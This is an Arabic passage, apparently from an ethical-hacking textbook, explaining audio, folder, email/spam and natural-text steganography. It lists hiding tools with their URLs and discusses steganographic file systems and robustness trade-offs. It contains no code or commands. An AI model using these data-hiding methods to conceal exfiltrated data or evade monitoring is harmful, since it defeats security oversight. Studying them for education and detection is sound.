‫ﻟﻠﻐﺎﯾﺔ ﺑﺎﻟﻧﺳﺑﺔ ﻟﻠﻣﺗﻧﺻت اﻟﻛﺷف ﻋن اﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ ﻣن إﺷﺎرة اﻟﺻوت‪ .‬ﯾﺳﺎﻋد ھذا اﻷﺳﻠوب ﻟﺗﺟﻧب اﻟﮭﺟﻣﺎت ﻣﺛل )‪(low-pass filtering‬‬
‫واﻗﺗطﺎع اﻟﺑﺎﯾت)‪. (bit truncation‬‬
‫ﺑراﻣﺞ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﺳﻣﻌﯾﺔ ﺗﻧﻔذ واﺣدة ﻣن ھذه اﻟطرق ﻹﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت اﻟﺳرﯾﺔ ﻓﻲ ﻣﻠﻔﺎت اﻟﺻوت‪.‬‬
‫‪Phase Encoding -5‬‬
‫‪ Phase coding‬ﯾﺗم وﺻﻔﮫ ﺑﺄﻧﮫ اﻟﻣرﺣﻠﺔ اﻟﺗﻲ ﯾﺗم ﻓﯾﮭﺎ اﺳﺗﺑدال ﺷرﯾﺣﺔ اﻟﺻوت اﻷوﻟﯾﺔ ﺑﺎﻟﻣرﺣﻠﺔ اﻟﻣرﺟﻌﯾﺔ اﻟﺗﻲ ﺗﻣﺛل اﻟﺑﯾﺎﻧﺎت‪ .‬ﯾﻘوم ﺑﺗرﻣﯾز‬
‫ﺑﺗﺎت اﻟرﺳﺎﻟﺔ ﺳرﯾﺔ ﻛﺄﻧﮫ ﻣرﺣﻠﺔ اﻟﺗﺣوﯾﻼت )‪ (phase shift‬ﻓﻲ ﻣرﺣﻠﺔ اﻟطﯾف )‪ (phase spectrum‬ﻓﻲ اﻻﺷﺎرة اﻟرﻗﻣﯾﺔ‪ ،‬ﯾﺗم ﺗﺣﻘﯾﻖ‬
‫اﻟﺗرﻣﯾز )‪ (soft encoding‬ﻣن ﺣﯾث ﻧﺳﺑﺔ اﻹﺷﺎرة إﻟﻰ اﻟﺿوﺿﺎء )‪.(signal-to-noise ratio‬‬
‫‪Audio Steganography: Deepsound‬‬

‫اﻟﻣﺻدر‪http://jpinsoft.net/DeepSound :‬‬
‫‪ Deepsound‬ﯾﺳﺎﻋدك ﻋﻠﻰ إﺧﻔﺎء أي ﻧوع ﻣن اﻟﺑﯾﺎﻧﺎت اﻟﺳرﯾﺔ ﻓﻲ اﻟﻣﻠﻔﺎت اﻟﺻوﺗﯾﺔ)‪ . (WAV and FLAC‬ﯾﻣﻛﻧك اﺳﺗﺧدام ھذه اﻷداة‬
‫ﻟﺗﺿﻣﯾن رﺳﺎﻟﺔ ﺳرﯾﮫ ﺧﺎﺻﺔ ﺑك ﻓﻲ اﻟﻣﻠف اﻟﺻوﺗﻲ‪ .‬وﺳوف ﺗﺳﻣﺢ ﻟك أﯾﺿﺎ ﻻﺳﺗﺧراج اﻟﻣﻠﻔﺎت اﻟﺳرﯾﺔ ﻣﺑﺎﺷرة ﻣن ﻣﺳﺎرات ﻗرص اﻟﺻوت‬
‫)‪ (Audio CD track‬ﻋﻧدﻣﺎ ﺗﻛون ﻓﻲ اﻟطرف اﻵﺧر‪ .‬ﻛﻣﺎ أﻧﮭﺎ ﻗﺎدرة ﻋﻠﻰ ﺗﺷﻔﯾر اﻟﻣﻠﻔﺎت اﻟﺳرﯾﺔ‪ ،‬وﺑﺎﻟﺗﺎﻟﻲ ﺗﻌزﯾز اﻷﻣن‪.‬‬
‫ﻟﻠوﺻول إﻟﻰ اﻟﺑﯾﺎﻧﺎت ﻓﻲ اﻟﻣﻠف اﻟﻧﺎﻗل‪ ،‬ﯾﻣﻛﻧك ﺑﺑﺳﺎطﺔ اﺳﺗﻌرض اﻟﻣوﻗﻊ ﻣﻊ ﻣﺗﺻﻔﺢ ﻣﻠف ‪ Deepsound‬ﺛم اﻟﻧﻘر ﺑﺎﻟزر اﻷﯾﻣن ﻟﻠﻣﺎوس ﻓوق‬
‫اﻟﻣﻠف اﻟﺻوﺗﻲ ﻻﺳﺗﺧراج اﻟﻣﻠف اﻟﺳري اﻟﺧﺎص ﺑك‪.‬‬

‫‪Audio Steganography Tools‬‬

‫ﯾﻣﻛﻧك أﯾﺿﺎ اﺳﺗﺧدام أدوات إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﺻوﺗﯾﺔ اﻟﺗﺎﻟﯾﺔ ﻹﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ اﻟﺧﺎﺻﺔ ﺑك ﻓﻲ ﻣﻠﻔﺎت اﻟﺻوت‪:‬‬
‫‪Mp3stegz available at http://sourceforge.net‬‬
‫‪MAXA Security Tools available at http://www.maxa-tools.com‬‬
‫‪BitCrypt available at http://bitcrypt.moshe-szweizer.com‬‬
‫‪MP3Stego available at http://www.petitcolas.net‬‬
‫‪Hide4PGP available at http://www.heinz-repp.onlinehome.de‬‬
‫‪CHAOS Universal available at http://safechaos.com‬‬
‫‪SilentEye available at http://www.silenteye.org‬‬
‫‪Quickcrypto available at http://www.quickcrypto.com‬‬
‫‪CryptArkan available at http://www.kuskov.com‬‬
‫‪Stegostick available at http://sourceforge.net‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪474‬‬

‫‪Folder Steganography‬‬
‫‪ Folder steganography‬ﯾﺷﯾر إﻟﻰ إﺧﻔﺎء ﻣﻌﻠوﻣﺎت ﺳرﯾﺔ ﻓﻲ اﻟﻣﺟﻠدات‪ .‬ھذا ﯾﻣﻛن أن ﯾﺗﺣﻘﻖ ﻣﻊ ﻣﺳﺎﻋدة ﻣن اﻷداة ‪.Invisible Secrets 4‬‬
‫‪Folder Steganography: Invisible Secrets 4‬‬

‫اﻟﻣﺻدر‪http://www.invisiblesecrets.com :‬‬
‫‪ Invisible Secrets 4‬ھو ﺑرﻧﺎﻣﺞ ﻟﺗﺷﻔﯾر اﻟﻣﻠﻔﺎت واﻟﺗﻲ ﺗﺣﺎﻓظ ﻋﻠﻰ رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﻣن ﻣﺟرﻣﻲ اﻹﻧﺗرﻧت وﯾﻣﻧﻊ اﻟﻣﮭﺎﺟﻣﯾن ﻣن‬
‫اﻻطﻼع ﻋﻠﻰ اﻟﻣﻠﻔﺎت اﻟﺧﺎﺻﺔ ﺑك‪ .‬ھذا اﻟﺑرﻧﺎﻣﺞ ﯾﻘوم ﺑﺗﺷﻔﯾر ﻟﯾس ﻓﻘط اﻟﺑﯾﺎﻧﺎت اﻟﺧﺎﺻﺔ واﻟﻣﻠﻔﺎت ﻟﺣﻔظﮭﺎ ﻓﻲ ﻣﻛﺎن آﻣن واﻟﻧﻘل اﻻﻣن ﻋﺑر‬
‫اﻟﺷﺑﻛﺔ‪ ،‬وﻟﻛن أﯾﺿﺎ ﯾﺧﻔﯾﮭم ﻓﻲ ﻣﺛل ھذا اﻟﻣﻛﺎن ﺑﺣﯾث ﻻ أﺣد ﯾﺳﺗطﯾﻊ اﻟﺗﻌرف ﻋﻠﯾﮭﺎ‪ .‬ﺣﺗﻰ اﻟﻣﮭﺎﺟم ﯾﺗﻌذر ﻓﻲ ﺗﺣدﯾد ﻣوﻗﻊ اﻟﻣﻌﻠوﻣﺎت اﻟﺣﺳﺎﺳﺔ‪.‬‬
‫ﻋﻧد وﺿﻊ اﻟوﺛﺎﺋﻖ اﻟﺧﺎﺻﺔ ﻓﺄﻧﮭﺎ ﺗظﮭر ﻛﺄﻧﮭﺎ ﻻ ﺷﻲء ﻣﮭم‪ ،‬ﻣﺛل اﻟﺻور أو ﻣﻠﻔﺎت اﻟﺻوت أو ﺻﻔﺣﺎت اﻟوﯾب‪ ،‬وھذه اﻷﻧواع ﻣن اﻟﻣﻠﻔﺎت ھﻲ‬
‫ﺗﻣوﯾﮫ ﻣﺛﺎﻟﻲ ﻟﺗﺧزﯾن ﻋﻠﻰ اﻟﻣﻌﻠوﻣﺎت اﻟﺣﺳﺎﺳﺔ‪ .‬ھذا اﻟﺑرﻧﺎﻣﺞ ﯾﺳﻣﺢ ﻟك ﺑﺗﺷﻔﯾر وإﺧﻔﺎء اﻟﻣﺳﺗﻧدات ﻣﺑﺎﺷرة ﻋن ﻣﺳﺗﻛﺷف اﻟوﯾﻧدوز‪ ،‬وﻣن ﺛم‬
‫ﻧﻘﻠﮭﺎ آﻟﯾﺎ ﻋن طرﯾﻖ اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ أو ﻋﺑر اﻹﻧﺗرﻧت‪.‬‬

‫‪Folder Steganography Tools‬‬

‫ﺑﺎﻹﺿﺎﻓﺔ إﻟﻰ ‪ ،Invisible Secrets 4‬ﯾﻣﻛﻧك أﯾﺿﺎ اﺳﺗﺧدام اﻷدوات اﻟﺗﺎﻟﯾﺔ ﻛﺄدوات ‪ folder steganography‬ﻹﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت‬
‫اﻟﺳرﯾﺔ اﻟﺧﺎﺻﺔ ﺑك ﻓﻲ ﻣﺟﻠدات‪:‬‬
‫‪Folder Lock available at http://www.newsoftwares.net‬‬
‫‪A+ Folder Locker available at http://www.giantmatrix.com‬‬
‫‪Toolwiz BSafe available at http://www.toolwiz.com‬‬
‫‪Hide Folders 2012 available at http://fspro.net‬‬
‫‪GiliSoft File Lock Pro available at http://www.gilisoft.com‬‬
‫‪Universal Shield available at http://www.everstrike.com‬‬
‫‪WinMend Folder Hidden available at http://www.winmend.com‬‬
‫‪Encrypted Magic Folders available at http://www.pc-magic.com‬‬
‫‪Quickcrypto available at http://quickcrypto.com‬‬
‫‪Max Folder Secure available at http://www.maxfoldersecure.com‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪475‬‬

‫‪Spam/Email Steganography‬‬

‫‪ Spam/email steganography‬ﯾﺷﯾر إﻟﻰ ﺗﻘﻧﯾﺔ إرﺳﺎل اﻟرﺳﺎﺋل اﻟﺳرﯾﺔ ﻋن طرﯾﻖ إﺧﻔﺎﺋﮭﺎ ﻓﻲ رﺳﺎﺋل اﻟﺑرﯾد اﻟﻣزﻋﺟﺔ‪/‬اﻟﺑرﯾد‬
‫اﻹﻟﻛﺗروﻧﻲ‪ .‬رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﻣزﻋﺟﺔ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﺑوﺻﻔﮭﺎ وﺳﯾﻠﺔ ﻟﻼﺗﺻﺎل اﻟﺳري ﻋن طرﯾﻖ دﻣﺞ اﻟرﺳﺎﺋل اﻟﺳرﯾﺔ ﺑﻧﻔس‬
‫اﻟطرﯾﻘﺔ‪ ،‬وإﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت اﻟﻣﺿﻣﻧﺔ ﻓﻲ رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﻣزﻋﺟﺔ‪ .‬ھذا اﻷﺳﻠوب ھو ﻣن اﻟﻣﻔﺗرض أن ﯾﺗم اﺳﺗﺧداﻣﮭﺎ ﻣن ﻗﺑل ﻣﺧﺗﻠف‬
‫اﻟوﻛﺎﻻت اﻟﻌﺳﻛرﯾﺔ‪ ،‬ﻣﻊ ﻣﺳﺎﻋدة ﻣن ﺧوارزﻣﯾﺎت اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ‪ .‬ھذا ﯾﻣﻛن ﺗﺣﻘﯾﻘﮫ ﻣﻊ ﻣﺳﺎﻋدة ﻣن اﻷداة ‪.Spam Mimic‬‬
‫‪Spam/Email Steganography: Spam Mimic‬‬

‫اﻟﻣﺻدر‪http://www.spammimic.com :‬‬
‫‪ Spam Mimic‬ھو ‪ Spam‬ﻟﻣﺣرك ‪ Mimic‬ل ‪ .Peter Wayner‬ﺣﯾث ﯾﻘوم ﺑﺗرﻣﯾز‪/‬ﺗﺷﻔﯾر اﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ ﻓﻲ رﺳﺎﺋل اﻟﺑرﯾد‬
‫اﻹﻟﻛﺗروﻧﻲ اﻟﻣزﻋﺟﺔ‪ .‬اﻟﺷﻲء اﻟﻣﻣﺗﻊ ﻓﻲ ھذا اﻟﺑرﻧﺎﻣﺞ ھو اﻧﮫ ﯾﻘوم ﺑﺗرﻣﯾز اﻟرﺳﺎﻟﺔ اﻟﻰ ﻓن اﻟﻛﻼم واﻟﺗﻌﻠﯾﻘﺎت ﻓﻲ ﻟﻌﺑﺔ اﻟﺑﯾﺳﺑول‪ .‬ﻓﺈﻧﮫ ﯾوﻓر‬
‫ﻗدرات ﻟﻛل ﻣن ﻓك اﻟﺗﺷﻔﯾر واﻟﺗرﻣﯾز‪ .‬اﻟﺗرﻣﯾز‪/‬اﻟﺗﺷﻔﯾر ﻣن ﻗﺑل ھذه اﻷداة ﻋن طرﯾﻖ ﺗرﻣﯾز اﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ ﻛﺄﻧﮭﺎ رﺳﺎﻟﺔ ﻣزﻋﺟﮫ )‪(Spam‬‬
‫ﻣﻊ ﻛﻠﻣﺔ ﻣرور‪ ،fake Russian ،fake PGP ،‬اﻟﻔﺿﺎء‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪476‬‬

‫‪Natural Text Steganography: Sams Big G Play Maker‬‬

‫ﺑراﻣﺞ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﻧﺻﯾﺔ ﺗﻘوم ﺑﺗﺣوﯾل اﻟﻣﻌﻠوﻣﺎت اﻟﺣﺳﺎﺳﺔ إﻟﻰ ﻋﻧﺎﺻر ﺣرﯾﺔ اﻟﺗﻌﺑﯾر اﻟﻣﻌرﻓﺔ ﻣن ﻗﺑل اﻟﻣﺳﺗﺧدم ﻣﺛل ‪.Play‬‬
‫‪ Sams Big 6 Play Maker‬ﯾﺳﺎﻋد ﻓﻲ أداء ‪.natural text steganography‬‬
‫‪ Sams Big G Play Maker‬ھو ﺑرﻧﺎﻣﺞ ﻣﺳﺗﻧد إﻟﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز اﻟﺗﻲ ﺗم ﺗﺻﻣﯾﻣﮭﺎ ﻹﺧﻔﺎء اﻟرﺳﺎﺋل اﻟﺳرﯾﺔ ﻓﻲ ﺷﻛل ﻣﺳرﺣﯾﺔ‬
‫)‪ (Play‬ﻣﺳﻠﯾﺔ أو ﻣﺣﺎدﺛﺔ‪ .‬ھذا ﯾﻧطﺑﻖ ﻋﺎدة ﻋﻠﻰ اﻟرﺳﺎﺋل اﻟﺻﻐﯾرة‪ .‬ﯾﺗم إﺧراج اﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ اﻟﺗﻲ ﯾﺗم إﻧﺷﺎؤھﺎ ﺑﺎﺳﺗﺧدام ھذه اﻷداة‪ ،‬ﻻ ﯾﻣﻛن‬
‫ﻟﻠﻣرء أن ﯾدرك أن ﻧص اﻟﻣﺳرﺣﯾﺔ اﻟﻧﺎﺗﺞ ﯾﺣﺗوي ﻋﻠﻰ اﻟرﺳﺎﻟﺔ اﻟﺧﻔﯾﺔ‪.‬‬

‫ﻣﺳﺎﺋل ﻓﻲ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت)‪(Issues in Information Hiding‬‬


‫ﺗﻧﺎﻗش اﻟﻣﻘﺎطﻊ اﻟﺛﻼﺛﺔ اﻟﺗﺎﻟﯾﺔ اﻟﻘﺿﺎﯾﺎ اﻟﺗﻲ ﯾﺟب أﺧذھﺎ ﻓﻲ اﻻﻋﺗﺑﺎر ﻋﻧد إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت‪.‬‬
‫‪Steganographic File System -1‬‬
‫ﻓﻲ ‪ ،steganographic file system‬ﯾﻘوم ﺑﺈﺧﻔﺎء ﻛﻣﯾﺔ ﻛﺑﯾرة ﻧﺳﺑﯾﺎ ﻣن اﻟﻣﻌﻠوﻣﺎت اﻟﺣﺳﺎﺳﺔ ﺿﻣن ﻧظﺎم اﻟﻣﻠﻔﺎت اﻟﻣﺿﯾف اﻟﻘﺎﺋﻣﺔ‪.‬‬
‫‪ Steganographic file system‬ﯾﻘوم ﺑﺗﺟﻣﯾﻊ أﺟزاء )‪ (allocates dynamically fragments‬ﻣن اﻟﻣﻌﻠوﻣﺎت اﻟﻣﺧﻔﯾﺔ إﻟﻰ ﻣواﻗﻊ‬
‫ﻏﯾر ﻣﺳﺗﺧدﻣﺔ ﻋﻠﻰ ﺟﮭﺎز اﻟﺗﺧزﯾن‪ ،‬ﻣﻣﺎ ﯾﺳﻣﺢ ﺑﺈﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت ﻟﺗﻛون ﺟزءا ﺿﻣن ﻧظﺎم ﻣﻠﻔﺎت اﻟﻣﺿﯾف‪ .‬ﻓﺈﻧﮫ ﯾﺳﻣﺢ أﯾﺿﺎ ﻟﻠﻣﺳﺗﺧدﻣﯾن‬
‫ﻹﻋطﺎء أﺳﻣﺎء وﻛﻠﻣﺔ اﻟﻣرور )ﻣﻔﺎﺗﯾﺢ اﻟوﺻول( ﻟﻠﻣﻠﻔﺎت‪ .‬ﻓﻲ ھذه اﻟطرﯾﻘﺔ‪ ،‬ﯾﺗم ﺗﻌﺗﯾم اﻟﺑﯾﺎﻧﺎت ﺑﺎﺳﺗﺧدام ﺧوارزﻣﯾﺎت اﻟﺗﺷﻔﯾر‪ ،‬وﻟﻛن ﯾﺗم رﻓض‬
‫وﺟود اﻟﺑﯾﺎﻧﺎت دون ﻣﻔﺗﺎح اﻟوﺻول اﻟﻣﻘﺎﺑﻠﺔ‪ ،‬أي اﻟﺗﻲ ﺗﻌطﻰ ﻣن ﻗﺑل اﻟﻣﺳﺗﺧدم‪ .‬دون ﻣﻔﺗﺎح اﻟوﺻول اﻟﻣﻧﺎﺳﺑﺔ )ﻛﻠﻣﺔ اﻟﻣرور( ﻓﺎن اﻟﻣﮭﺎﺟم ﻻ‬
‫ﯾﻣﻛن اﻟﺣﺻول ﻋﻠﻰ اﻟﺑﯾﺎﻧﺎت ﻣن اﻟﻣﻠف‪.‬‬
‫ﯾﺗم اﺳﺗﺧدام اﻟطرﯾﻘﺔ اﻟﺗﺎﻟﯾﺔ ﻟﺑﻧﺎء ﻧظﺎم اﻟﻣﻠﻔﺎت اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ‪:‬‬
‫‪ -‬ﯾﺑدأ ﻧظﺎم اﻟﻣﻠﻔﺎت ﻣﻊ ﺑﯾﺎﻧﺎت ﻋﺷواﺋﯾﺔ‪.‬‬
‫‪ -‬اﻟﻛﺗل اﻟﻣﺷﻔرة ﯾﺗم ﻛﺗﺎﺑﺗﮭﺎ إﻟﻰ ﻣواﻗﻊ ﻣزﯾﻔﮫ ﺑﺎﺳﺗﺧدام اﻟﻣﻔﺗﺎح واﻟذي ﯾﺗم اﻟﺣﺻول ﻋﻠﯾﮫ ﻣن اﺳم اﻟﻣﻠف وﻛﻠﻣﺔ ﻣرور اﻟﻣﺟﻠد ﻹﺧﻔﺎء‬
‫اﻟﻣﻠف ﻓﻲ ﻛﺗل ﺑﯾﺎﻧﺎت ﻋﺷواﺋﯾﺔ‪ .‬ﻓﺎذا اﺳﺗﻣر اﻟﻛﺗﺎﺑﺔ ﻋﻠﻰ ﻧظﺎم اﻟﻣﻠﻔﺎت‪ ،‬ﻓﺎن ﻣن اﻟﻣﺗوﻗﻊ ﺣدوث اﺻطداﻣﺎت وﯾﺗم إﻋﺎدة اﻟﻛﺗﺎﺑﺔ ﻓوق‬
‫اﻟﻛﺗل‪ ،‬ﻣﻣﺎ ﯾﺳﻣﺢ ﺳوى ﻟﺟزء ﺻﻐﯾر ﻣن ﻣﺳﺎﺣﺔ اﻟﻘرص ﻻﺳﺗﺧداﻣﮭﺎ ﺑﺄﻣﺎن‪.‬‬
‫‪ -‬ﯾﻧﺑﻐﻲ أن ﺗﻧﺳﺦ اﻟﻌدﯾد ﻣن اﻟﻛﺗل‪.‬‬
‫‪ -‬ﻣطﻠوب أﯾﺿﺎ طرﯾﻘﺔ ﻟﺗﺣدﯾد اﻟﻛﺗل اﻟﺗﻲ ﺗم إﻋﺎدة اﻟﻛﺗﺎﺑﺔ ﻋﻠﯾﮭﺎ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪477‬‬

‫اﻻﺣﺗﯾﺎج ﻷﻧظﻣﺔ اﻟﻣﻠﻔﺎت اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ )‪(Need for steganographic file systems‬‬


‫ﺗوﻓﯾر أﻧظﻣﺔ ﻣﻠﻔﺎت اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ ﺣﻣﺎﯾﺔ إﺿﺎﻓﯾﺔ ﻟﻠﺑﯾﺎﻧﺎت اﻟﻣﺧﻔﯾﺔ ﺑطرﯾﻘﺔ ﻣرﯾﺣﺔ‪ .‬ﻣﻊ ﻣﺳﺎﻋدة ﻣن ھذه‪ ،‬ﯾﻣﻛن ﻟﻠﻣﺳﺗﺧدﻣﯾن ﺗﺧزﯾن‬
‫اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ )ﻣﺛل اﻷﺳرار اﻟﺗﺟﺎرﯾﺔ( أو اﻟﻣﺎﻟﯾﺔ ﻋﻠﻰ أﻧظﻣﺗﮭﺎ دون أي ﺧوف‪ .‬ﻟﻠوﺻول إﻟﻰ اﻟﻣﻌﻠوﻣﺎت‪ ،‬ﯾﺟب ﻋﻠﻰ اﻟﺷﺧص إﺟراء‬
‫اﻷذوﻧﺎت اﻟﻣﻣﻧوﺣﺔ واﻟﻣﻌرﻓﺔ واﻟﺗﻲ ﺑدوﻧﮭﻣﺎ ﻻ ﯾﻣﻛن اﻟوﺻول إﻟﻰ اﻟﻣﻌﻠوﻣﺎت ﻓﻲ ﻣﻠف‪ .‬ﺗﻘﻧﯾﺎت إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﻻ ﺗﻘوم ﺑﺗﺷﻔﯾر اﻟﺑﯾﺎﻧﺎت ﻓﻘط‬
‫وﻟﻛن أﯾﺿﺎ ﺗﻘوم ﺑﺈﺧﻔﺎء وﺟود اﻟﺑﯾﺎﻧﺎت‪ .‬اﻟﺑﯾﺎﻧﺎت اﻟﺗﻲ ھﻲ ﺿﻣن ﻧظﺎم اﻟﻣﻠﻔﺎت اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ ﻻ ﯾﻣﻛن اﻟوﺻول إﻟﯾﮭﺎ ﻣن ﻗﺑل أن ﯾﺿطر‬
‫اﻟﻣﺳﺗﺧدم اﺳﺗﺧدام ﻣﻔﺗﺎح اﻟوﺻول )اﻷذوﻧﺎت اﻟﻣﻣﻧوﺣﺔ(‪.‬‬
‫‪ Levels of Visibility -2‬ﻣﺳﺗوﯾﺎت اﻟرؤﯾﺔ‬
‫إذا ﻛﺎﻧت ﻋﻣﻠﯾﺔ اﻟﺗﺿﻣﯾن ﻗﺎﻣت ﺑﺗﺷوﯾﮫ اﻟﻐطﺎء ﻟدرﺟﺔ أﻧﮫ ﺗﻛون ﻏﯾر ﻣﻠﺣوظﮫ ﺑﺻرﯾﺎ‪ ،‬وھذا ﯾﻌﻧﻲ إذا ﺗم ﺗﺷوﯾﮫ اﻟﺻورة ﺑﺷﻛل واﺿﺢ‪ ،‬ﻓﮭذا‬
‫ﯾﻌﻧﻰ ان اﻟﻧﺎﻗل ﻏﯾر ﻛﺎﻓﻲ ﻟﻠﺣﻣوﻟﺔ‪ .‬وﺑﺎﻟﻣﺛل‪ ،‬إذا ﻟم ﯾﺗم ﺗﺷوﯾﮫ اﻟﺻورة‪ ،‬ﻓﮭذا ﯾﻌﻧﻰ أن اﻟﻧﺎﻗل ﻛﺎﻓﻲ‪ .‬واﻟطرﯾﻘﺔ اﻟﺗﻲ ﯾﺗم ﻓﯾﮭﺎ ﺗﺿﻣﯾن اﻟرﺳﺎﻟﺔ ﯾﺗم‬
‫ﺗﺣدﯾدھﺎ ﻋن طرﯾﻖ إذا ﻛﺎﻧت اﻟﺑﯾﺎﻧﺎت ﻏﯾر ﻣﺣﺳوﺳﺔ أم ﻻ‪ .‬ﻟﻠﺣد ﻣن ﺳرﻗﺔ اﻟﺑﯾﺎﻧﺎت‪ ،‬ﻏﺎﻟﺑﺎ ﻣﺎ ﯾﺗم ﻧﺷر وﺟود اﻟﻌﻼﻣﺔ اﻟﻣﺎﺋﯾﺔ‪ .‬وﻣﻊ ذﻟك‪ ،‬ﻓﺎن‬
‫ﻧﺷر وﺟود اﻟﻌﻼﻣﺔ اﻟﻣﺎﺋﯾﺔ ﯾﺗﯾﺢ اﻟﻌدﯾد ﻣن اﻷﺳﺎﻟﯾب اﻟﺗﻲ ﯾﺗﻌﯾن ﺗﻧﻔﯾذھﺎ ﻟﻣﺣﺎوﻟﺔ ﺗﻐﯾﯾر أو ﺗﻌطﯾل اﻟﻌﻼﻣﺔ اﻟﻣﺎﺋﯾﺔ‪ .‬ﻋﻧد زﯾﺎدة وﺿوح اﻟﺑﯾﺎﻧﺎت‪،‬‬
‫ﻓﺎن ھذا ﯾزﯾد أﯾﺿﺎ ﻣن اﺣﺗﻣﺎﻻت اﻟﺗﻼﻋب ﻓﻲ اﻟﺑﯾﺎﻧﺎت‪.‬‬
‫‪ -3‬اﻟﻣﺗﺎﻧﺔ ﻣﻘﺎﺑل اﻟﺣﻣوﻟﺔ )‪(Robustness versus Payload‬‬
‫ﻣن أﺟل أن ﯾﻛون ھﻧﺎك وﺳﯾﻠﺔ ﻗوﯾﺔ ﻣن ﺗﺿﻣﯾن اﻟرﺳﺎﻟﺔ‪ ،‬ﯾﻧﺑﻐﻲ اﻟﺣﻔﺎظ ﻋﻠﻰ اﻟﺗﻛرار ﻟﻣﻘﺎوﻣﺔ اﻟﺗﻐﯾﯾرات اﻟﺗﻲ أدﺧﻠت ﻋﻠﻰ اﻟﻐطﺎء‪ .‬وﻣﻊ ذﻟك‪،‬‬
‫ﻓﺎن زﯾﺎدة ﻣﺗﺎﻧﺔ اﻟرﺳﺎﻟﺔ ﯾﻌﻧﻲ أن ﻣﺳﺎﺣﺔ أﻗل ﺻﺎﻟﺣﺔ ﻟﻼﺳﺗﻌﻣﺎل ﻟﻠﺣﻣوﻟﺔ‪ .‬ﯾﺟب وزن اﻟﻣﺗﺎﻧﺔ ﺿد ﺣﺟم اﻟﺣﻣوﻟﺔ‪.‬‬
‫‪File Format Dependence -4‬‬
‫ﺗﺣوﯾل اﻟﻣﻠﻔﺎت اﻟﺗﻲ ﺗﺣﺗوي ﻋﻠﻰ ‪ lossless information‬إﻟﻰ ﻣﻠﻔﺎت ﻣﺿﻐوطﺔ ﺗﺣﺗوي ﻋﻠﻰ ‪ Lossy information‬ﯾﻣﻛﻧﮭﺎ أن ﯾدﻣر‬
‫اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ اﻟﻣوﺟودة ﻓﻲ اﻟﻐطﺎء‪ .‬ﺑﻌض ﻋﻣﻠﯾﺎت ﺗﺿﻣﯾن اﻟﺑﯾﺎﻧﺎت ﺗﻌﺗﻣد ﻋﻠﻰ ﺗﻧﺳﯾﻖ اﻟﻣﻠف اﻟﻧﺎﻗل‪ ،‬ﻓﻲ ﺣﯾن أن آﺧرﯾن ﻻ ﯾﻌﺗﻣدون ﻋﻠﻰ‬
‫ﺗﻧﺳﯾﻖ اﻟﻣﻠف‪ .‬ﯾﺳﺗﺧدم ﺧوارزﻣﯾﺔ ﺿﻐط ‪ jpeg‬ﺣﺳﺎﺑﺎت ‪ floating-point‬ﻟﺗرﺟﻣﺔ اﻟﺻورة إﻟﻰ ﻣﺟﻣوﻋﺔ ﻣن اﻷﻋداد اﻟﺻﺣﯾﺣﺔ‪ .‬ﻋﻣﻠﯾﺔ اﻟﺗﺣوﯾل‬
‫ھذه ﯾﻣﻛن أن ﯾؤدي إﻟﻰ أﺧطﺎء اﻟﺗﻘرﯾب اﻟﺗﻲ ﻗد ﺗﻘﺿﻰ ﻋﻠﻰ أﺟزاء ﻣن اﻟﺻورة‪ .‬ﻻ ﺗؤدي ھذه اﻟﻌﻣﻠﯾﺔ ﻓﻲ أي اﺧﺗﻼف ﻣﻠﺣوظ ﻓﻲ اﻟﺻورة‪.‬‬
